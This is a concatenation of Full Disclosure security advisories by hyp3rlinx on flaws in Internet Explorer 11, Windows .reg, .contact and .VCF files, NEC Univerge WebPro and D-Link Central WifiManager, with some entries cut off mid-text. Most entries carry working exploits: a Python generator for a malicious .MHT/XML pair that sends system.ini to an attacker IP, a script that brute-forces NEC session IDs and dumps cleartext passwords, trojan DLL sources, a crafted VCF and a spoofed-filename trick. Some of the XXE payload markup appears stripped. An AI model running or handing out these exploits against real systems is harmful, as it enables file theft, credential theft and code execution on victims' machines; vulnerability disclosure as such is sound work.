[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-v11-XML-EXTERNAL-ENTITY-INJECTION-0DAY.txt
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Microsoft Internet Explorer v11
(latest version)
Internet Explorer is a series of graphical web browsers developed by
Microsoft and included in the Microsoft Windows line of operating systems,
starting in 1995.
[Vulnerability Type]
XML External Entity Injection
[CVE Reference]
N/A
[Security Issue]
Internet Explorer is vulnerable to XML External Entity attack if a user
opens a specially crafted .MHT file locally.
This can allow remote attackers to potentially exfiltrate Local files and
conduct remote reconnaissance on locally installed
Program version information. Example, a request for "c:\Python27\NEWS.txt"
can return version information for that program.
Upon opening the malicious ".MHT" file locally it should launch Internet
Explorer. Afterwards, user interactions like duplicate tab "Ctrl+K"
and other interactions like right click "Print Preview" or "Print" commands
on the web-page may also trigger the XXE vulnerability.
However, a simple call to the window.print() Javascript function should do
the trick without requiring any user interaction with the webpage.
Importantly, if files are downloaded from the web in a compressed archive
and opened using certain archive utilities MOTW may not work as advertised.
Typically, when instantiating ActiveX Objects like "Microsoft.XMLHTTP"
users will get a security warning bar in IE and be prompted
to activate blocked content. However, when opening a specially crafted .MHT
file using malicious markup tags the user will get no such
active content or security bar warnings.
e.g.
C:\sec>python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /datatears.xml HTTP/1.1" 200 -
127.0.0.1 - - [10/Apr/2019 20:56:28] "GET
/?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FONEGA40WOA.FON=EGA40WOA.FONCGA80WOA.FON=CGA80WOA.FONCGA40WOA.FON=CGA40WOA.FON[drivers]wave=mmdrv.dlltimer=timer.drv[mci]
HTTP/1.1" 200 -
Tested successfully in latest Internet Explorer Browser v11 with latest
security patches on Win7/10 and Server 2012 R2.
[POC/Video URL]
https://www.youtube.com/watch?v=fbLNbCjgJeY
[Exploit/POC]
POC to exfil Windows "system.ini" file.
Note: Edit attacker server IP in the script to suit your needs.
1) Use below script to create the "datatears.xml" XML and XXE embedded
"msie-xxe-0day.mht" MHT file.
2) python -m SimpleHTTPServer
3) Place the generated "datatears.xml" in Python server web-root.
4) Open the generated "msie-xxe-0day.mht" file, watch your files be
exfiltrated.
#Microsoft Internet Explorer XXE 0day
#Creates malicious XXE .MHT and XML files
#Open the MHT file in MSIE locally, should exfil system.ini
#By hyp3rlinx
#ApparitionSec
ATTACKER_IP="localhost"
PORT="8000"
mht_file=(
'From:\n'
'Subject:\n'
'Date:\n'
'MIME-Version: 1.0\n'
'Content-Type: multipart/related; type="text/html";\n'
'\tboundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001"\n'
'This is a multi-part message in MIME format.\n\n\n'
'--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001\n'
'Content-Type: text/html; charset="UTF-8"\n'
'Content-Location: main.htm\n\n'
'http://www.w3.org/TR/html4/transitional.dtd;>\n'
'\n'
'\n'
'\n'
'MSIE XXE 0day\n'
'\n'
'\n'
'\n'
'\n'
'\n'
'\n'
'%sp;\n'
'%param1;\n'
']>\n'
'\n'
'\n'
'\n'
'\n'
'\n'
'window.print();\n'
'\n'
'\n'
'\n'
'MSIE XML External Entity 0day PoC.\n'
'Discovery: hyp3rlinx\n'
'ApparitionSec\n'
'\n'
'\n'
'\n'
'\n'
'\n\n\n'
'--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001--'
)
xml_file=(
'\n'
'">\n'
'\n'
'">\n'
)
def mk_msie_0day_filez(f,p):
f=open(f,"wb")
f.write(p)
f.close()
if __name__ == "__main__":
mk_msie_0day_filez("msie-xxe-0day.mht",mht_file)
mk_msie_0day_filez("datatears.xml",xml_file)
print "Microsoft Internet Explorer XML External Entity 0day PoC."
print "Files msie-xxe-0day.mht and datatears.xml Created!."
print "Discovery: Hyp3rlinx / Apparition Security"
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: March 27, 2019
Vendor acknowledgement: March 27, 2019
Case Opened: March 28, 2019
MSRC reponse April 10, 2019: "We determined that a fix for this issue will
be considered in a future version of this product or service.
At this time, we will not be providing ongoing updates of the status of the
fix for this issue, and we have cl
[FD] [**UPDATED] Microsoft Windows .Reg File / Dialog Box Message Spoofing 0day
Added a few things I had previously left out that should have been mentioned earlier. [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.REG-FILE-DIALOG-BOX-MESSAGE-SPOOFING.txt [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] A file with the .reg file extension is a Registration file used by the Windows registry. These files can contain hives, keys, and values. .reg files can be created from scratch in a text editor or can be produced by the Windows registry when backing up parts of the registry. [Vulnerability Type] Windows .Reg File Dialog Box Message Spoofing [CVE Reference] N/A [Security Issue] The Windows registry editor allows specially crafted .reg filenames to spoof the default registry dialog warning box presented to an end user. This can potentially trick unsavvy users into choosing the wrong selection shown on the dialog box. Furthermore, we can deny the registry editor its ability to show the default secondary status dialog box (Win 10), thereby hiding the fact that our attack was successful. Normally when a user opens a .reg file UAC will launch (if user is run as Admin) if targeting a non privleged user we can still hijack HKCU reg settings without having to deal with UAC. After they will get the registry security warning dialog box asking them if they "trust the source" and "Are you sure you want to continue?" etc and will also have a choice of either 'Yes' or 'No' to select from. However, we can inject our own messages thru the filename to direct the user to wrongly click "Yes", as the expected "Are you sure you want to continue?" dialog box message is under our control. The registry dialog echoes back the filename plus any text we add and allows us to terminate part of its default security warning message. We achieve this using % encoded characters in the filename like %n or %r and %0. Example, the "do not add it to the registry" and "Are you sure you want to continue?" default warning messages can be done away with using %0. This spoofing flaw lets us spoof the "Are you sure you want to continue?" warning message to instead read "Click Yes" or whatever else we like. Potentially making a user think they are cancelling the registry import as the security warning dialog box is now lying to them. Denial of secondary registry editor status dialog box (hiding successful attacks) in Windows 10: Typically, upon a successful import the registry editor pops up another dialog box with a status message telling us "the keys and values contained in have been successfully added to the registry". We can obstruct that behavior to deny this secondary registry editor dialog from appearing by tacking on a (null) right before the end of our filename using %1 or %25 like: "Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg" If don't want to use (null) use %3 but it will display a asian char instead but still prevents the secondary registry dialog box you. You will have to manually refresh the registry written to in order to see the values stored when using these dialog denial of service methods. Note: Denial of the secondary dialog box seems to only work on Windows 10. Behaviors I discovered playing with registry filenames that affect the dialog box, depending on Windows OS version you will get different results. % - can be used for obfuscation e.g. %h%a%t%e = hate %b will create white-space %n makes a newline %r makes a newline %1 creates (null) - important as we prevent the second registry dialog from appearing after a successful import! %0 Important terminates string %25 (Windows 10) creates (null) - Important as we prevent the second registry dialog from appearing after a successful import! %3 - Important as we prevent the second registry dialog from appearing after a successful import! (but shows asian char) %5 (Windows 10) duplicates the default registry dialog box message by "n" amount of times per amount of %5 injected into the filename %25 (Windows 7) duplicates the default registry dialog box message by "n" amount of times per amount of %25 injected into the filename %2525 prevents registry editor from opening %169 will show our junky filename in the dialog box (we don't want that) %3, %197, %17 and some others change the default language shown in the registry dialog box to asian characters etc Each injected character can be separated by a percent "%" sign without messing up our spoofed message, we can leverage this to obfuscate the end of the filename. We then use %0 to terminate the message string so that the second .reg extension and default registry messages are not displayed in the registry dialog box.
[FD] Microsoft Windows .Reg File / Dialog Box Message Spoofing Vulnerability
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.REG-FILE-DIALOG-BOX-MESSAGE-SPOOFING.txt [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] A file with the .reg file extension is a Registration file used by the Windows registry. These files can contain hives, keys, and values. .reg files can be created from scratch in a text editor or can be produced by the Windows registry when backing up parts of the registry. [Vulnerability Type] Windows .Reg File Dialog Box Message Spoofing [CVE Reference] N/A [Security Issue] The Windows registry editor allows specially crafted .reg filenames to spoof the default registry dialog warning box presented to an end user. This can potentially trick unsavvy users into choosing the wrong selection shown on the dialog box. Furthermore, we can deny the registry editor its ability to show the default secondary status dialog box (Win 10), thereby hiding the fact that our attack was successful. Normally when a user opens a .reg file UAC will launch, after they will get the registry security warning dialog box asking them if they "trust the source" and "Are you sure you want to continue?" etc and will also have a choice of either 'Yes' or 'No' to select from. However, we can inject our own messages thru the filename to direct the user to wrongly click "Yes", as the expected "Are you sure you want to continue?" dialog box message is under our control. The registry dialog echoes back the filename plus any text we add and allows us to terminate part of its default security warning message. We achieve this using % encoded characters in the filename like %n or %r and %0. Example, the "do not add it to the registry" and "Are you sure you want to continue?" default warning messages can be done away with using %0. This spoofing flaw lets us spoof the "Are you sure you want to continue?" warning message to instead read "Click Yes" or whatever else we like. Potentially making a user think they are cancelling the registry import as the security warning dialog box is now lying to them. Denial of secondary registry editor status dialog box (hiding successful attacks) in Windows 10: Typically, upon a successful import the registry editor pops up another dialog box with a status message telling us "the keys and values contained in have been successfully added to the registry". We can obstruct that behavior to deny this secondary registry editor dialog from appearing by tacking on a (null) right before the end of our filename using %1 or %25 like: "Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg" If don't want to use (null) use %3 but it will display a asian char instead but still prevents the secondary registry dialog box you. You will have to manually refresh the registry written to in order to see the values stored when using these dialog denial of service methods. Note: Denial of the secondary dialog box seems to only work on Windows 10. Behaviors I discovered playing with registry filenames that affect the dialog box, depending on Windows OS version you will get different results. % - can be used for obfuscation e.g. %h%a%t%e = hate %b will create white-space %n makes a newline %r makes a newline %1 creates (null) - important as we prevent the second registry dialog from appearing after a successful import! %0 Important terminates string %25 (Windows 10) creates (null) - Important as we prevent the second registry dialog from appearing after a successful import! %3 - Important as we prevent the second registry dialog from appearing after a successful import! (but shows asian char) %5 (Windows 10) duplicates the default registry dialog box message by "n" amount of times per amount of %5 injected into the filename %25 (Windows 7) duplicates the default registry dialog box message by "n" amount of times per amount of %25 injected into the filename %2525 prevents registry editor from opening %169 will show our junky filename in the dialog box (we don't want that) %3, %197, %17 and some others change the default language shown in the registry dialog box to asian characters etc Each injected character can be separated by a percent "%" sign without messing up our spoofed message, we can leverage this to obfuscate the end of the filename. We then use %0 to terminate the message string so that the second .reg extension and default registry messages are not displayed in the registry dialog box. The filename "Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg" will show as "Microsoft-Security-Update-v1.2-Windows-10.reg" in the registry dialog box, along with
[FD] Microsoft Windows .CONTACT File / HTML Injection Mailto: Remote Code Execution
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-HTML-INJECTION-MAILTO-LINK-ARBITRARY-CODE-EXECUTION.txt [+] ISR: ApparitionSec [+] Zero Day Initiative Program [+] ZDI-CAN-7591 [Vendor] www.microsoft.com [Product] Microsoft .CONTACT File A file with the CONTACT file extension is a Windows Contact file. They're used in Windows 10, Windows 8, Windows 7, and Windows Vista. This is the folder where CONTACT files are stored by default: C:\Users\[USERNAME]\Contacts\. [Vulnerability Type] Mailto: HTML Link Injection Remote Code Execution [Security Issue] This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of ".contact" files, the E-mail address field takes an expected E-mail address value, however the .CONTACT file is vulnerable to HTML injection as no validation is performed. Therefore, if an attacker references an executable file using an HREF tag it will run that instead without warning instead of performing the expected email behavior. This is dangerous and would be unexpected to an end user. The E-mail addresses Mailto: will point to an arbitrary executable like. p...@microsoft.com Additionally the executable file can live in a sub-directory and be referenced like "p...@microsoft.com" or attackers can use directory traversal techniques to point to a malware say sitting in the targets Downloads directory like: p...@microsoft.com Making matters worse is if the the files are compressed then downloaded "mark of the web" (MOTW) may potentially not work as expected using certain archive utils. This advisory was initially one of three different vulnerabilities I reported to Zero Day Initiative Program (ZDI), that microsoft decided to not release a security fix for and close. The first cases I reported to ZDI were .VCF and .CONTACT files Website address input fields. This example is yet another vector affecting Windows .CONTACT files and is being released as the .CONTACT file issue is now publicly known. [Exploit/POC] Create a Windows .CONTACT file and inject the following HTML into the E-mail: field p...@microsoft.com Windows will prompt you like "The e-mail address you have entered is not a valid internet e-mail address. Do you still want to add this address?" Click Yes. Open the .CONTACT file and click the Mailto: link BOOM! Windows calculator will execute. Attacker supplied code is not limited to .EXE, .CPL or .COM as .VBS files will also execute! :) [POC Video URL] https://vimeo.com/312824315 [Disclosure Timeline] Reported to ZDI 2018-11-22 (ZDI-CAN-7591) Another separate vulnerability affecting MS Windows .contact files affected the Website address input fields and was publicly disclosed January 16, 2019. https://www.zerodayinitiative.com/advisories/ZDI-19-121/ Public disclosure : January 22, 2019 [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Microsoft Windows ".contact" File / Insufficient UI Warning Arbitrary Code Execution
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Microsoft .CONTACT File A file with the CONTACT file extension is a Windows Contact file. They're used in Windows 10, Windows 8, Windows 7, and Windows Vista. This is the folder where CONTACT files are stored by default: C:\Users\[USERNAME]\Contacts\. [Vulnerability Type] Insufficient UI Warning Arbitrary Code Execution [Security Issue] This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of ".contact" files node param which takes an expected website value, however if an attacker references an executable file it will run that instead without warning instead of performing expected web navigation. This is dangerous and would be unexpected to an end user. e.g. www.hyp3rlinx.altervista.com Executable files can live in a sub-directory so when the ".contact" website link is clicked it traverses directories towards the executable and runs. Making matters worse is if the the files are compressed then downloaded "mark of the web" (MOTW) may potentially not work as expected with certain archive utilitys. The ".\" chars allow directory traversal to occur in order to run the attackers supplied executable sitting unseen in the attackers directory. This advisory is a duplicate issue that currently affects Windows .VCF files, and released for the sake of completeness as it affects Windows .contact files as well. [Exploit/POC] Rename any executable file extension from ".exe" to ".com" to be like a valid web domain name. Create a directory to house the executable file Modify the contact file website link like ---> http.\\www..com Contact website link now points at "dir .\ executable" ---> http.\\www..com Compress the files using archive utility and place in webserver for download. [POC Video URL] https://vimeo.com/311759191 [Disclosure Timeline] Reported to ZDI 2018-11-30 This exact same vulnerability exists and affects Microsoft Windows .VCF files sharing the same root cause and was publicly disclosed 2019-01-10. https://www.zerodayinitiative.com/advisories/ZDI-19-013/ Public disclosure : January 16, 2019 [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Microsoft VCF File Insufficient UI Warning Remote Code Execution 0day
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-FILE-INSUFFICIENT-WARNING-REMOTE-CODE-EXECUTION.txt
[+] ISR: ApparitionSec
[+] Zero Day Initiative Program
[Vendor]
www.microsoft.com
[Product]
A VCF file is a standard file format for storing contact information for a
person or business.
Microsoft Outlook supports the vCard and vCalendar features. These are a
powerful new approach to electronic Personal Data Interchange (PDI).
[Vulnerability Type]
Insufficient UI Warning Remote Code Execution
[CVE Reference]
ZDI-19-013
ZDI-CAN-6920
[Security Issue]
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Windows.
User interaction is required to exploit this vulnerability in that the
target must visit a malicious page or open a malicious file.
The specific flaw exists within the processing of VCard files. Crafted data
in a VCard file can cause Windows to display a dangerous hyperlink.
The user interface fails to provide any indication of the hazard.
An attacker can leverage this vulnerability to execute code in the context
of the current user.
[Exploit/POC]
1) create a directory and name it "http" this will house the .CPL
executable file.
2) create a .CPL file and give it a website name, I named mine
"www.hyp3rlinx.altervista.cpl"
or whatever website you wish so it can be referenced in the VCF file.
#include
/* hyp3rlinx */
/*
gcc -c -m32 hyp3rlinx.altervista.c
gcc -shared -m32 -o hyp3rlinx.altervista.cpl hyp3rlinx.altervista.o
*/
void ms_vcf_0day(){
MessageBox( 0, "Continue with install?" , "TrickyDealC0der :)" , MB_YESNO +
MB_ICONQUESTION );
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){
switch(fdwReason){
case DLL_PROCESS_ATTACH:{
ms_vcf_0day();
break;
}
case DLL_PROCESS_DETACH:{
ms_vcf_0day();
break;
}
case DLL_THREAD_ATTACH:{
ms_vcf_0day();
break;
}
case DLL_THREAD_DETACH:{
ms_vcf_0day();
break;
}
}
return TRUE;
}
3) make sure to rename the executable .DLL extension to a .CPL extension if
you did not follow compile instructions above to output as ".CPL".
e.g. hyp3rlinx.altervista.dll --> hyp3rlinx.altervista.cpl
4) Create .VCF mail file I named mine "trickyDealC0der.vcf"
For the URL in the .VCF Mail file specify a URL like...
URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl
The Windows .VCF File content:
"trickyDealC0der.vcf"
BEGIN:VCARD
VERSION:4.0
N:Tricky;DealC0der;;;
FN:TrickyDealC0der
EMAIL;TYPE=home;PREF=1:M$@PwnedAgain.com
TEL;TYPE="cell,home";PREF=1:tel:+000-000-
ADR;TYPE=home;PREF=1:;;1 NYC;NY;;WC2N;USA
URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl
END:VCARD
Now, open the "trickyDealC0der.vcf" file and click the website link, the
VCF file will traverse back one to the "http" directory where
our CPL executable file lives and KABOOM! :)
[References]
https://www.zerodayinitiative.com/advisories/ZDI-19-013/
[Network Access]
Remote
[POC Video URL]
https://vimeo.com/310684003
[Disclosure Timeline]
Notification: Trend Micro Zero Day Initiative Program
2018-07-23 - Vulnerability reported to vendor
2019-01-10 - Coordinated public release of advisory
2019-01-10 - Advisory Updated
ADDITIONAL DETAILS
08/06/18 - ZDI reported the vulnerability to the vendor
08/07/18 - The vendor acknowledged the report and provided a tracking #
10/01/18 – The vendor requested an additional file
10/03/18 – ZDI provided added files and a new PoC
10/03/18 – The vendor advised the report did not meet the bar for service
10/05/18 – ZDI advised that we believe the report is exploitable and
notified the vendor of the intent to 0-day on 10/16/18
10/08/18 – The vendor advised ZDI they had re-considered a fix and
requested an extension to 01/08/19
10/09/18 – ZDI agreed to the short extension
11/14/18 – The vendor again advised ZDI of the target patch date 01/08/19
12/12/18 – The vendor provided ZDI a CVE
12/19/18 - The vendor wrote to ZDI to advise that “engineering team had
decided to pursue the fix as v.Next” and “Microsoft has decided that it
will not be fixing this vulnerability and we are closing this case”
12/27/18 – ZDI notified the vendor of the intent to 0-day on 01/07/18
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use
[FD] CVE-2018-11741 / CVE-2018-11742 / NEC Univerge Sv9100 WebPro - 6.00 / Predictable Session ID / Clear Text Password Storage
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/NEC-UNIVERGE-WEBPRO-v6.00-PREDICTABLE-SESSIONID-CLEARTEXT-PASSWORDS.txt
[+] ISR: ApparitionSec
***Greetz: indoushka | Eduardo B. 0day***
[Vendor]
www.necam.com
[Affected Product Code Base]
NEC Univerge Sv9100 WebPro - 6.00.00
NEC Univerge WebPro, is a web-based programming tool for the NEC Switch,
which is used to program corporate Telephone systems.
Public facing installations as of Dec 1, 2018
https://www.shodan.io/search?query=Server+Henry
Result: 7,797
[Vulnerability Type(s)]
[CVE Reference(s)]
Predictable Session ID - CVE-2018-11741 / Cleartext Password Storage -
CVE-2018-11742
[Attack Vectors]
Make repeated remote HTTP requests until arriving at a valid authenticated
sessionId.
Security Issue:
NEC Univerge WebPro suffers from a "Predictable Session ID" that can
potentially disclose all user account information including passwords
stored in clear text in the Web UI.
Attackers can simply increment numbers until arriving at a live session,
then by using a specific URI dump the entire account information for all
users including the clear text passwords.
e.g..
curl http://NEC-VICTIM-IP/Home.htm?sessionId=12959(8)
Exploit/POC:
=
from socket import *
import re
#Univerge Sv9100 NEC WebPro : 6.00
#Dumps user accounts and plaintext passwords stored in Web UI in
Administrator Programming Password Setup' webpage
#http://TARGET-IP/Home.htm?sessionId=12959(8) "GOTO(8)" will retrieve
all account usernames and cleartext passwords.
print "NEC Univerge Sv9100 WebPro - 6.00.00 / Remote 0day Exploit POC"
print "hyp3rlinx"
IP=raw_input("[+] TARGET> ")
res=''
findme="Programming Password Setup"
cnt=0
tmp=False
tmp2=False
pwned=False
#check application is NEC and vuln version
def is_NEC_webpro(u):
global tmp,tmp2,cnt
res=''
cnt+=1
s=socket(AF_INET, SOCK_STREAM)
s.connect((IP,80))
s.send('GET '+u+' HTTP/1.1\r\nHost: '+IP+'\r\n\r\n')
while True:
res=s.recv(4048)
if res.find('')!=-1:
break
s.close()
if re.findall(r"\bWebPro\b", res):
tmp=True
if tmp and cnt < 3:
is_NEC_webpro('/Login.htm')
if re.findall(r"\b6.00.00\b", res) and re.findall(r"\bNEC
Corporation of America\b", res):
tmp2 = True
if tmp == True and tmp2 == True:
return True
return False
def dump(acct):
file=open('NEC-Accounts.txt', 'w')
file.write(acct+'\n')
file.close()
def breach(sid):
global pwned
try:
s=socket(AF_INET, SOCK_STREAM)
s.connect((IP,80))
sid=str(sid)
print 'trying sessid '+sid
s.send('GET
/Home.htm?sessionId%3d'+sid+'(8)%20HTTP/1.1\r\nHost: '+IP+'\r\n\r\n')
except Exception as e:
print str(e)
while True:
res = s.recv(4096)
if res.find('')!=-1:
break
if re.findall(r"\bProgramming Password Setup\b",res)!=-1: ## We hit
an active session.
dump(res)
print res
pwned=True
s.close()
return pwned
def sessgen():
for sessid in range(1000,15000): ##test 14109
if breach(sessid):
break
if __name__=='__main__':
if is_NEC_webpro('/'):
sessgen()
else:
print 'Not NEC or version not vuln.'
Network Access:
===
Remote
Severity:
=
High
Disclosure Timeline:
=
Vendor Notification: May 15, 2018
No reply
Vendor Notification: May 18, 2018
No reply
Vendor Notification: June 4, 2018
No reply
Mitre assign CVE: June 5, 2018
JPCERT replies: June 6, 2018
JPCERT shares information with NEC : June 7, 2018
Request status : August 11, 2018
JPCERT contact NEC : August 14, 2018
No reply from vendor
Request status : August 21, 2018
JPCERT again contacts NEC : August 21, 2018
JPCERT "vendor working on a release" : August 23 2018
JPCERT "Vendor release October 2018" : September 12, 2018
NEC "Requests public disclosure after December 1st." : November 19, 2018
December 2, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security rel
[FD] CVE-2018-15515 / D-LINK Central WifiManager CWM-100 / Trojan File SYSTEM Privilege Escalation
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SYSTEM-PRIVILEGE-ESCALATION.txt
[+] ISR: ApparitionSec
***Greetz: indoushka | Eduardo B.***
[Vendor]
us.dlink.com
[Product]
D-LINK Central WifiManager (CWM 100)
Version 1.03 r0098
http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/
D-Link’s free Central WiFiManager is a web-based wireless Access Point
management tool, enabling you to create and manage multi-site,
multi-tenancy wireless networks.
[Vulnerability Type]
Trojan File SYSTEM Privilege Escalation
[Affected Component]
"quserex.dll"
[CVE Reference]
CVE-2018-15515
[Security Issue]
D-Link Central WiFiManager CWM-100 1.03 r0098 devices will load a Trojan
horse "quserex.dll" and will create a new thread running with SYSTEM
integrity.
[Impact]
Code Execution as SYSTEM
[Exploit/POC]
1) Create 32bit DLL named "quserex.dll" and place in "CaptivelPortal.exe"
directory under the DLINK directory
2) Restart the service "CaptivelPortal"
3) Proof, examine using process monitor (sysinternals)
#include
/* hyp3rlinx */
/*
gcc -c -m32 quserex.c
gcc -shared -m32 -o quserex.dll quserex.o
*/
void executo(){
MessageBox(NULL, "Enjoy ur SYSTEM Integrity!", ":)", MB_OK);
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){
switch(fdwReason){
case DLL_PROCESS_ATTACH:{
executo();
break;
}
case DLL_PROCESS_DETACH:{
executo();
break;
}
case DLL_THREAD_ATTACH:{
executo();
break;
}
case DLL_THREAD_DETACH:{
executo();
break;
}
}
return TRUE;
}
[Network Access]
Local
[Severity]
High
[Disclosure Timeline]
Vendor Notification: August 8, 2018
Vendor acknowledgement: August 8, 2018
CVE assigned Mitre: August 18, 2018
Request update: August 31, 2018
No reply from vendor
Request update: September 6, 2018
Vendor: "R has begun this month to patch your report." : September 12,
2018
Request update: October 3, 2018
Vendor: "will release a new beta for QA verification by end of this month
10'2018."
Request update: October 16, 2018
no reply from vendor
Request update: October 23, 2018
Vendor: "It still is schedule to be released by the 31st." : October 23,
2018
Inform vendor of disclosure by November 8, 2018 : October 31, 2018
No reply from vendor
November 8, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2018-15517 / D-LINK Central WifiManager CWM-100 / Server Side Request Forgery
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt [+] ISR: ApparitionSec ***Greetz: indoushka | Eduardo B.*** [Vendor] us.dlink.com [Product] D-LINK Central WifiManager (CWM 100) Version 1.03 r0098 http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/ D-Link’s free Central WiFiManager is a web-based wireless Access Point management tool, enabling you to create and manage multi-site, multi-tenancy wireless networks. [Vulnerability Type] Server Side Request Forgery [Affected Component] MailConnect [CVE Reference] CVE-2018-15517 [Security Issue] Using a web browser or script SSRF can be initiated against internal/external systems to conduct port scans by leveraging D-LINKs MailConnect component. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, leading to SSRF, as demonstrated by an index.php/System/MailConnect/host/ 127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using Web Browser. [Exploit/POC] https://VICTIM-IP/index.php/System/MailConnect/host/port/secure/ reply: OK Scan internal port 22 SSH: https://VICTIM-IP/index.php/System/MailConnect/host/VICTIM-IP/port/22/secure/ reply: OK [Network Access] Remote [Severity] Medium [Disclosure Timeline] Vendor Notification: August 8, 2018 Vendor acknowledgement: August 8, 2018 CVE assigned Mitre: August 18, 2018 Request update: August 31, 2018 No reply from vendor Request update: September 6, 2018 Vendor: "R has begun this month to patch your report." : September 12, 2018 Request update: October 3, 2018 Vendor: "will release a new beta for QA verification by end of this month 10'2018." Request update: October 16, 2018 no reply from vendor Request update: October 23, 2018 Vendor: "It still is schedule to be released by the 31st." : October 23, 2018 Inform vendor of disclosure by November 8, 2018 : 